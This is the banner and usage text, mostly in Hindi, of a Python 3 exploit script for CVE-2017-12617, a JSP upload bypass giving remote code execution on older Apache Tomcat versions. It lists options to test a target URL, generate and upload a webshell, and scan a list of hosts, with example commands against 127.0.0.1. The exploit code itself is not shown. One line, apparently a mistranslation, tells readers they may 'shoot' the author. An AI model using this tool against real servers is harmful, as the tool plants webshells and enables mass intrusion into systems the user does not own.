
Apache Tomcat < 9.0.1 (बीटा) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP अपलोड बाईपास / Python3 के लिए रिमोट कोड निष्पादन
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution for Python3
मैंने मूल स्क्रिप्ट में कुछ समायोजन किए हैं ताकि यह Python 3 के साथ संगत हो!
यदि कोई समस्या या मुद्दे आते हैं, तो बेझिझक मुझे ईमेल करें [email protected] या आप मुझे गोली भी मार सकते हैं यदि आप चाहें।
मेरे ईमेल का मूल्यांकन न करें, इसका उपयोग एक अस्थायी ईमेल के रूप में होता है
./cve-2017-12617.py [options]
विकल्प:
-u ,--url [::] लक्ष्य URL की जांच करें कि वह असुरक्षित है या नहीं
-p,--pwn [::] वेबशेल जनरेट करें और अपलोड करें
-l,--list [::] होस्ट सूची
[+]उपयोग:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt